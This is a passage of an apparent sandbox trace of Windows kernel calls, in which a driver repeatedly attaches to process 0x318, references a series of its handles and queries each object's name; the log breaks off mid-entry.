[0264.893] IoCompleteRequest () returned 0x0 [0264.893] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.893] PsAcquireProcessExitSynchronization () returned 0x0 [0264.893] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.893] ObReferenceObjectByHandle (in: Handle=0x614, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014879c870, HandleInformation=0x0) returned 0x0 [0264.893] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.893] PsReleaseProcessExitSynchronization () returned 0x2 [0264.893] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80222 [0264.893] ObQueryNameString (in: Object=0xffffc0014879c870, ObjectNameInfo=0xffffe0006a0d0044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d0044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.893] ObfDereferenceObject (Object=0xffffc0014879c870) returned 0x10000 [0264.893] IoCompleteRequest () returned 0x0 [0264.893] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.893] PsAcquireProcessExitSynchronization () returned 0x0 [0264.893] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.893] ObReferenceObjectByHandle (in: Handle=0x618, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014879c870, HandleInformation=0x0) returned 0x0 [0264.893] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.893] PsReleaseProcessExitSynchronization () returned 0x2 [0264.893] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80221 [0264.893] ObQueryNameString (in: Object=0xffffc0014879c870, ObjectNameInfo=0xffffe0006840f7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006840f7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.893] ObfDereferenceObject (Object=0xffffc0014879c870) returned 0xffff [0264.893] IoCompleteRequest () returned 0x0 [0264.893] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.893] PsAcquireProcessExitSynchronization () returned 0x0 [0264.893] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.893] ObReferenceObjectByHandle (in: Handle=0x61c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001487a6570, HandleInformation=0x0) returned 0x0 [0264.893] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.893] PsReleaseProcessExitSynchronization () returned 0x2 [0264.893] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80220 [0264.893] ObQueryNameString (in: Object=0xffffc001487a6570, ObjectNameInfo=0xffffe0006a3f2044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f2044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.893] ObfDereferenceObject (Object=0xffffc001487a6570) returned 0x8000 [0264.893] IoCompleteRequest () returned 0x0 [0264.893] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.893] PsAcquireProcessExitSynchronization () returned 0x0 [0264.893] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.893] ObReferenceObjectByHandle (in: Handle=0x620, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000698eec30, HandleInformation=0x0) returned 0x0 [0264.893] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.893] PsReleaseProcessExitSynchronization () returned 0x2 [0264.893] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x8021f [0264.893] ObQueryNameString (in: Object=0xffffe000698eec30, ObjectNameInfo=0xffffe00069197044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069197044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.893] ObfDereferenceObject (Object=0xffffe000698eec30) returned 0x800e [0264.893] IoCompleteRequest () returned 0x0 [0264.893] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.894] PsAcquireProcessExitSynchronization () returned 0x0 [0264.894] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.894] ObReferenceObjectByHandle (in: Handle=0x624, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001487aa080, HandleInformation=0x0) returned 0x0 [0264.894] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.894] PsReleaseProcessExitSynchronization () returned 0x2 [0264.894] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x8021e [0264.894] ObQueryNameString (in: Object=0xffffc001487aa080, ObjectNameInfo=0xffffe0006a3a0044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3a0044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.894] ObfDereferenceObject (Object=0xffffc001487aa080) returned 0x8000 [0264.894] IoCompleteRequest () returned 0x0 [0264.894] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.894] PsAcquireProcessExitSynchronization () returned 0x0 [0264.894] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.894] ObReferenceObjectByHandle (in: Handle=0x628, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069749850, HandleInformation=0x0) returned 0x0 [0264.894] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.894] PsReleaseProcessExitSynchronization () returned 0x2 [0264.894] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x8021d [0264.894] ObQueryNameString (in: Object=0xffffe00069749850, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.894] ObfDereferenceObject (Object=0xffffe00069749850) returned 0x7ffc [0264.894] IoCompleteRequest () returned 0x0 [0264.894] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.894] PsAcquireProcessExitSynchronization () returned 0x0 [0264.894] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.894] ObReferenceObjectByHandle (in: Handle=0x62c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069920f20, HandleInformation=0x0) returned 0x0 [0264.894] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.894] PsReleaseProcessExitSynchronization () returned 0x2 [0264.894] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x8021c [0264.894] ObQueryNameString (in: Object=0xffffe00069920f20, ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.894] ObfDereferenceObject (Object=0xffffe00069920f20) returned 0x7e79 [0264.894] IoCompleteRequest () returned 0x0 [0264.894] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.894] PsAcquireProcessExitSynchronization () returned 0x0 [0264.894] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.894] ObReferenceObjectByHandle (in: Handle=0x664, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006996bde0, HandleInformation=0x0) returned 0x0 [0264.894] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.894] PsReleaseProcessExitSynchronization () returned 0x2 [0264.894] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x8021b [0264.894] ObQueryNameString (in: Object=0xffffe0006996bde0, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.894] ObfDereferenceObject (Object=0xffffe0006996bde0) returned 0x7fff [0264.894] IoCompleteRequest () returned 0x0 [0264.894] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.894] PsAcquireProcessExitSynchronization () returned 0x0 [0264.894] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.895] ObReferenceObjectByHandle (in: Handle=0x668, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069924b10, HandleInformation=0x0) returned 0x0 [0264.895] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.895] PsReleaseProcessExitSynchronization () returned 0x2 [0264.895] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x8021a [0264.895] ObQueryNameString (in: Object=0xffffe00069924b10, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.895] ObfDereferenceObject (Object=0xffffe00069924b10) returned 0x7fec [0264.895] IoCompleteRequest () returned 0x0 [0264.895] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.895] PsAcquireProcessExitSynchronization () returned 0x0 [0264.895] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.895] ObReferenceObjectByHandle (in: Handle=0x66c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000699a5600, HandleInformation=0x0) returned 0x0 [0264.895] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.895] PsReleaseProcessExitSynchronization () returned 0x2 [0264.895] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80219 [0264.895] ObQueryNameString (in: Object=0xffffe000699a5600, ObjectNameInfo=0xffffe00068a64044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a64044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.895] ObfDereferenceObject (Object=0xffffe000699a5600) returned 0x7ffd [0264.895] IoCompleteRequest () returned 0x0 [0264.895] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.895] PsAcquireProcessExitSynchronization () returned 0x0 [0264.895] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.895] ObReferenceObjectByHandle (in: Handle=0x684, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006996bc70, HandleInformation=0x0) returned 0x0 [0264.895] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.895] PsReleaseProcessExitSynchronization () returned 0x2 [0264.895] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80218 [0264.895] ObQueryNameString (in: Object=0xffffe0006996bc70, ObjectNameInfo=0xffffe0006a40f044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40f044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.895] ObfDereferenceObject (Object=0xffffe0006996bc70) returned 0x7ffd [0264.895] IoCompleteRequest () returned 0x0 [0264.895] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.895] PsAcquireProcessExitSynchronization () returned 0x0 [0264.895] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.895] ObReferenceObjectByHandle (in: Handle=0x6a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006996d500, HandleInformation=0x0) returned 0x0 [0264.895] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.895] PsReleaseProcessExitSynchronization () returned 0x2 [0264.895] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80217 [0264.895] ObQueryNameString (in: Object=0xffffe0006996d500, ObjectNameInfo=0xffffe00069041044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069041044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.895] ObfDereferenceObject (Object=0xffffe0006996d500) returned 0x7ffb [0264.895] IoCompleteRequest () returned 0x0 [0264.895] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.895] PsAcquireProcessExitSynchronization () returned 0x0 [0264.895] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.895] ObReferenceObjectByHandle (in: Handle=0x6a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006996da20, HandleInformation=0x0) returned 0x0 [0264.895] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.895] PsReleaseProcessExitSynchronization () returned 0x2 [0264.895] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80216 [0264.895] ObQueryNameString (in: Object=0xffffe0006996da20, ObjectNameInfo=0xffffe0006a4147c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4147c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.896] ObfDereferenceObject (Object=0xffffe0006996da20) returned 0x7ffd [0264.896] IoCompleteRequest () returned 0x0 [0264.896] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.896] PsAcquireProcessExitSynchronization () returned 0x0 [0264.896] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.896] ObReferenceObjectByHandle (in: Handle=0x6ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006996ef20, HandleInformation=0x0) returned 0x0 [0264.896] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.896] PsReleaseProcessExitSynchronization () returned 0x2 [0264.896] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80215 [0264.896] ObQueryNameString (in: Object=0xffffe0006996ef20, ObjectNameInfo=0xffffe0006a44d7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44d7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.896] ObfDereferenceObject (Object=0xffffe0006996ef20) returned 0x7ffd [0264.896] IoCompleteRequest () returned 0x0 [0264.896] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.896] PsAcquireProcessExitSynchronization () returned 0x0 [0264.896] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.896] ObReferenceObjectByHandle (in: Handle=0x6b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006996ea00, HandleInformation=0x0) returned 0x0 [0264.896] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.896] PsReleaseProcessExitSynchronization () returned 0x2 [0264.896] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80214 [0264.896] ObQueryNameString (in: Object=0xffffe0006996ea00, ObjectNameInfo=0xffffe0006a334044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a334044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.896] ObfDereferenceObject (Object=0xffffe0006996ea00) returned 0x7ffd [0264.896] IoCompleteRequest () returned 0x0 [0264.896] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.896] PsAcquireProcessExitSynchronization () returned 0x0 [0264.896] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.896] ObReferenceObjectByHandle (in: Handle=0x6b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006996e4e0, HandleInformation=0x0) returned 0x0 [0264.896] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.896] PsReleaseProcessExitSynchronization () returned 0x2 [0264.896] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80213 [0264.896] ObQueryNameString (in: Object=0xffffe0006996e4e0, ObjectNameInfo=0xffffe0006a3ae6c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3ae6c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.896] ObfDereferenceObject (Object=0xffffe0006996e4e0) returned 0x7ffb [0264.896] IoCompleteRequest () returned 0x0 [0264.896] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.896] PsAcquireProcessExitSynchronization () returned 0x0 [0264.896] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.897] ObReferenceObjectByHandle (in: Handle=0x6b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006996ff20, HandleInformation=0x0) returned 0x0 [0264.897] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.897] PsReleaseProcessExitSynchronization () returned 0x2 [0264.897] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80212 [0264.897] ObQueryNameString (in: Object=0xffffe0006996ff20, ObjectNameInfo=0xffffe0006a3307c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3307c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.897] ObfDereferenceObject (Object=0xffffe0006996ff20) returned 0x7ffb [0264.897] IoCompleteRequest () returned 0x0 [0264.897] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.897] PsAcquireProcessExitSynchronization () returned 0x0 [0264.897] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.897] ObReferenceObjectByHandle (in: Handle=0x6bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006996fa00, HandleInformation=0x0) returned 0x0 [0264.897] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.897] PsReleaseProcessExitSynchronization () returned 0x2 [0264.897] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80211 [0264.897] ObQueryNameString (in: Object=0xffffe0006996fa00, ObjectNameInfo=0xffffe0006a331244, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a331244, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.897] ObfDereferenceObject (Object=0xffffe0006996fa00) returned 0x7ffd [0264.897] IoCompleteRequest () returned 0x0 [0264.897] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.897] PsAcquireProcessExitSynchronization () returned 0x0 [0264.897] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.897] ObReferenceObjectByHandle (in: Handle=0x6c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006996f4e0, HandleInformation=0x0) returned 0x0 [0264.897] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.897] PsReleaseProcessExitSynchronization () returned 0x2 [0264.897] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x80210 [0264.897] ObQueryNameString (in: Object=0xffffe0006996f4e0, ObjectNameInfo=0xffffe0006a33d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a33d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.897] ObfDereferenceObject (Object=0xffffe0006996f4e0) returned 0x7ffb [0264.897] IoCompleteRequest () returned 0x0 [0264.897] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.897] PsAcquireProcessExitSynchronization () returned 0x0 [0264.897] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.897] ObReferenceObjectByHandle (in: Handle=0x6c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006999dc40, HandleInformation=0x0) returned 0x0 [0264.897] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.897] PsReleaseProcessExitSynchronization () returned 0x2 [0264.898] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x8020f [0264.898] ObQueryNameString (in: Object=0xffffe0006999dc40, ObjectNameInfo=0xffffe0006a3f8044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f8044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.898] ObfDereferenceObject (Object=0xffffe0006999dc40) returned 0x7ffd [0264.898] IoCompleteRequest () returned 0x0 [0264.898] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.898] PsAcquireProcessExitSynchronization () returned 0x0 [0264.898] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.898] ObReferenceObjectByHandle (in: Handle=0x6c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000699a3db0, HandleInformation=0x0) returned 0x0 [0264.898] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.898] PsReleaseProcessExitSynchronization () returned 0x2 [0264.898] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x8020e [0264.898] ObQueryNameString (in: Object=0xffffe000699a3db0, ObjectNameInfo=0xffffe00068178044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068178044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.898] ObfDereferenceObject (Object=0xffffe000699a3db0) returned 0x7fff [0264.898] IoCompleteRequest () returned 0x0 [0264.898] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.898] PsAcquireProcessExitSynchronization () returned 0x0 [0264.898] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.898] ObReferenceObjectByHandle (in: Handle=0x7a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069a1f6e0, HandleInformation=0x0) returned 0x0 [0264.898] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.898] PsReleaseProcessExitSynchronization () returned 0x2 [0264.898] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x8020d [0264.898] ObQueryNameString (in: Object=0xffffe00069a1f6e0, ObjectNameInfo=0xffffe00068a59684, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a59684, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.898] ObfDereferenceObject (Object=0xffffe00069a1f6e0) returned 0x7fff [0264.898] IoCompleteRequest () returned 0x0 [0264.898] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.898] PsAcquireProcessExitSynchronization () returned 0x0 [0264.898] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.898] ObReferenceObjectByHandle (in: Handle=0x7c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0007b7fef20, HandleInformation=0x0) returned 0x0 [0264.898] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.898] PsReleaseProcessExitSynchronization () returned 0x2 [0264.898] ObfDereferenceObject (Object=0xffffe000698383c0) returned 0x8020c [0264.898] ObQueryNameString (in: Object=0xffffe0007b7fef20, ObjectNameInfo=0xffffe0006a816044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a816044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.898] ObfDereferenceObject (Object=0xffffe0007b7fef20) returned 0x8000 [0264.898] IoCompleteRequest () returned 0x0 [0264.898] PsLookupProcessByProcessId (in: ProcessId=0x318, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.898] PsAcquireProcessExitSynchronization () returned 0x0 [0264.898] KeStackAttachProcess (in: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe000698383c0, ApcState=0xffffd000b1b8e400) [0264.898] ObReferenceObjectByHandle (in: Handle=0x818, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: 